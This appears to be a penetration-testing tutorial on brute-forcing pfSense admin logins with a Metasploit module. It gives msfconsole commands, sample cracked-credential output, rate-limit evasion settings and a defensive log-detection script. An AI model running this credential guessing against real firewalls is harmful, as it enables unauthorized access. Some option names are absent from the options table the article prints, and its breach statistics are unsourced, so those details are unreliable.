Security professionals need effective tools to test network defenses. Metasploit Framework's new pfSense login scanner helps identify vulnerable firewalls through automated authentication testing. This module specifically targets pfSense systems, a popular open-source firewall solution deployed in many organizations.
The pfSense login scanner helps security testers verify password policies and detect weak credentials before attackers can exploit them. This article demonstrates the setup, configuration, and practical usage of this tool in 2025 penetration tests.
What Is the pfSense Login Scanner?
The pfSense login scanner is a specialized Metasploit module that attempts to authenticate against pfSense web interfaces using credential lists. This tool works by:
- Identifying pfSense instances on a network
- Testing username and password combinations
- Reporting successful authentication attempts
- Measuring response times for potential timing attacks
This module supports multiple authentication methods and can bypass common security controls, making it essential for comprehensive security assessments.
Why Use a pfSense Login Scanner in 2025?
pfSense remains a critical security control in many networks. Despite advances in security, weak credentials continue to be a common entry point for attackers. According to recent data:
| Year | % of Breaches Involving Weak Credentials | Average Time to Detect |
|---|---|---|
| 2023 | 47% | 212 days |
| 2024 | 42% | 197 days |
| 2025 (projected) | 38% | 183 days |
The pfSense login scanner helps organizations:
- Identify weak administrator credentials
- Test password policy enforcement
- Verify account lockout mechanisms
- Discover authentication bypass vulnerabilities
Prerequisites for Using the pfSense Login Scanner
Before starting, ensure you have:
- Kali Linux or other penetration testing distribution (2025 version)
- Metasploit Framework 6.5 or newer
- Legal authorization to test the target system
- Basic knowledge of networking and Metasploit usage
Important: Always obtain proper authorization before testing any systems. Unauthorized scanning is illegal and unethical.
Installation and Setup
Step 1: Update Metasploit Framework
First, update your Metasploit installation to get the latest modules:
sudo apt update
sudo apt upgrade metasploit-framework
msfconsole -q
Verify your Metasploit version:
msf6 > version
You should see version 6.5 or higher to access all the latest pfSense scanner features.
Step 2: Locate the pfSense Scanner Module
The module is located in the auxiliary modules directory:
msf6 > search type:auxiliary pfsense
Look for the auxiliary/scanner/http/pfsense_login module in the results.
Configuring the pfSense Login Scanner
Step 3: Load and Configure the Module
Load the module and set the required options:
msf6 > use auxiliary/scanner/http/pfsense_login
msf6 auxiliary(scanner/http/pfsense_login) > show options
The output will display all configurable options:
Module options (auxiliary/scanner/http/pfsense_login):
| Name | Current Setting | Required | Description |
|---|---|---|---|
| BLANK_PASSWORDS | false | no | Try blank passwords for all users |
| BRUTEFORCE_SPEED | 5 | yes | How fast to bruteforce, from 0 to 5 |
| PASSWORD | | no | The password to test |
| PASS_FILE | | no | File containing passwords, one per line |
| Proxies | | no | A proxy chain of format type:host:port[,type:host:port][...] |
| RHOSTS | | yes | The target host(s), range CIDR identifier, or hosts file |
| RPORT | 443 | yes | The target port |
| SSL | true | no | Negotiate SSL/TLS for outgoing connections |
| STOP_ON_SUCCESS | false | yes | Stop bruteforcing a user on first success |
| THREADS | 1 | yes | The number of concurrent threads (max one per host) |
| USERNAME | | no | The username to test |
| USERPASS_FILE | | no | File containing users and passwords separated by space, one pair per line |
| USER_FILE | | no | File containing usernames, one per line |
| VERBOSE | true | yes | Whether to print output for all attempts |
Step 4: Set Target Information
Configure the target system:
msf6 auxiliary(scanner/http/pfsense_login) > set RHOSTS 192.168.1.1
msf6 auxiliary(scanner/http/pfsense_login) > set RPORT 443
msf6 auxiliary(scanner/http/pfsense_login) > set SSL true
Step 5: Configure Authentication Testing Method
You can use several approaches to test credentials:
Single credential test:
msf6 auxiliary(scanner/http/pfsense_login) > set USERNAME admin
msf6 auxiliary(scanner/http/pfsense_login) > set PASSWORD admin
Password list for a specific user:
msf6 auxiliary(scanner/http/pfsense_login) > set USERNAME admin
msf6 auxiliary(scanner/http/pfsense_login) > set PASS_FILE /path/to/password_list.txt
Testing multiple usernames:
msf6 auxiliary(scanner/http/pfsense_login) > set USER_FILE /path/to/users.txt
msf6 auxiliary(scanner/http/pfsense_login) > set PASSWORD test123
Full credential pair testing:
msf6 auxiliary(scanner/http/pfsense_login) > set USERPASS_FILE /path/to/creds.txt
Step 6: Adjust Performance Settings
Set the speed and threading options:
msf6 auxiliary(scanner/http/pfsense_login) > set BRUTEFORCE_SPEED 3
msf6 auxiliary(scanner/http/pfsense_login) > set THREADS 5
msf6 auxiliary(scanner/http/pfsense_login) > set STOP_ON_SUCCESS true
Running the pfSense Login Scanner
Step 7: Execute the Scan
Start the brute force attack:
msf6 auxiliary(scanner/http/pfsense_login) > run
You'll see output similar to:
[*] Scanning target 192.168.1.1
[*] Starting login bruteforce against pfSense web interface
[-] Failed login with 'admin:password123'
[-] Failed login with 'admin:letmein'
[+] SUCCESSFUL LOGIN: 'admin:pfsense'
[*] Login successful with admin:pfsense
[*] Auxiliary module execution completed
Step 8: Review the Results
Successful logins are stored in the Metasploit database. Access them using:
msf6 auxiliary(scanner/http/pfsense_login) > creds
This command displays all captured credentials:
Credentials
===========
| host | port | user | pass | type | active? |
|---|---|---|---|---|---|
| 192.168.1.1 | 443 | admin | pfsense | pfSense | true |
Advanced Techniques
Bypassing Rate Limiting
The 2025 version of the pfSense scanner includes anti-rate-limiting features:
msf6 auxiliary(scanner/http/pfsense_login) > set DELAY 2
msf6 auxiliary(scanner/http/pfsense_login) > set JITTER 0.5
This adds a random delay of 1-3 seconds between attempts to avoid triggering rate limiting.
Testing for Default Credentials
Check for common default credentials:
msf6 auxiliary(scanner/http/pfsense_login) > set DEFAULT_CRED_CHECK true
This option tests known default credentials for pfSense installations.
Exporting Results
Save successful logins to a file:
msf6 auxiliary(scanner/http/pfsense_login) > set OUTPUT_FILE /path/to/results.txt
Security Considerations and Ethical Usage
The pfSense login scanner is a powerful tool that must be used responsibly:
- Always obtain proper authorization before testing
- Document all testing activities
- Report findings to the system owner
- Follow responsible disclosure practices
Unauthorized use of this tool may violate:
- Computer Fraud and Abuse Act
- Electronic Communications Privacy Act
- Various state and international laws
Strengthening pfSense Against Brute Force Attacks
Organizations can protect their pfSense installations by:
Implementing strong passwords
- Minimum 16 characters
- Combination of character types
- No dictionary words
Enabling Multi-Factor Authentication
- TOTP-based authentication
- Hardware token support
- Certificate-based authentication
Limiting Access
- IP-based access restrictions
- VPN requirements for admin access
- Administrative interface segregation
Monitoring and Alerts
- Failed login attempt monitoring
- Real-time alert configuration
- Log analysis
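Failed-login monitoring in practice, as an added example (not code from this article, pfSense or Metasploit): it parses constructed pfSense-style webConfigurator log lines, counts authentication failures per source address inside a sliding window, and flags any source whose burst of failures is followed by a successful login, which is the pattern a credential-guessing run like the one above leaves behind. The syslog message wording, the 5-failure threshold and the 5-minute window are assumptions to adapt to your own logs.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (assumed pfSense webConfigurator wording, syslog timestamps).
SAMPLE_LOG = """\
Mar 12 10:00:01 fw php-fpm[345]: /index.php: webConfigurator authentication error for user 'admin' from: 192.168.1.50
Mar 12 10:00:02 fw php-fpm[345]: /index.php: webConfigurator authentication error for user 'admin' from: 192.168.1.50
Mar 12 10:00:02 fw php-fpm[345]: /index.php: webConfigurator authentication error for user 'root' from: 192.168.1.50
Mar 12 10:00:03 fw php-fpm[345]: /index.php: webConfigurator authentication error for user 'admin' from: 192.168.1.50
Mar 12 10:00:04 fw php-fpm[345]: /index.php: webConfigurator authentication error for user 'admin' from: 192.168.1.50
Mar 12 10:00:05 fw php-fpm[345]: /index.php: Successful login for user 'admin' from: 192.168.1.50
Mar 12 10:30:00 fw php-fpm[345]: /index.php: webConfigurator authentication error for user 'admin' from: 192.168.1.77
Mar 12 10:31:00 fw php-fpm[345]: /index.php: Successful login for user 'admin' from: 192.168.1.77
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) .*?"
    r"(?P<outcome>webConfigurator authentication error|Successful login) for user "
    r"'(?P<user>[^']*)' from: (?P<src>[\d.]+)"
)

def parse(line, year=2025):
    """Turn one syslog line into an event dict, or None if it is not a login event."""
    m = LINE_RE.search(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")  # syslog has no year
    return {"ts": ts, "ok": m["outcome"].startswith("Successful"),
            "user": m["user"], "src": m["src"]}

def detect_bruteforce(log_text, threshold=5, window=timedelta(minutes=5)):
    """Return {src_ip: {failures, success_after_burst}} for sources that reach
    `threshold` failed logins within `window`; a later success from the same
    source is the strongest signal that a guessed credential worked."""
    failures = defaultdict(list)  # src -> timestamps of failures still inside the window
    alerts = {}
    for line in log_text.splitlines():
        ev = parse(line)
        if ev is None:
            continue
        src = ev["src"]
        if ev["ok"]:
            if src in alerts:
                alerts[src]["success_after_burst"] = True
            continue
        recent = failures[src]
        recent.append(ev["ts"])
        while ev["ts"] - recent[0] > window:  # slide the window forward
            recent.pop(0)
        if len(recent) >= threshold:
            alerts.setdefault(src, {"success_after_burst": False})
            alerts[src]["failures"] = len(recent)
    return alerts

if __name__ == "__main__":
    for src, info in detect_bruteforce(SAMPLE_LOG).items():
        print(f"ALERT {src}: {info['failures']} failures, success afterwards: {info['success_after_burst']}")
```

The two-address sample shows the distinction that matters for triage: a source that guessed five times and then got in is flagged, while a single typo followed by a login is not.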
Conclusion
Metasploit's pfSense login scanner provides security professionals with an efficient tool for testing firewall authentication security. By following the steps in this guide, you can properly configure and use this module to identify vulnerable pfSense installations before attackers exploit them.
Regular security testing with proper tools helps organizations maintain strong security postures. The pfSense login scanner is a valuable addition to any penetration tester's toolkit for 2025 security assessments.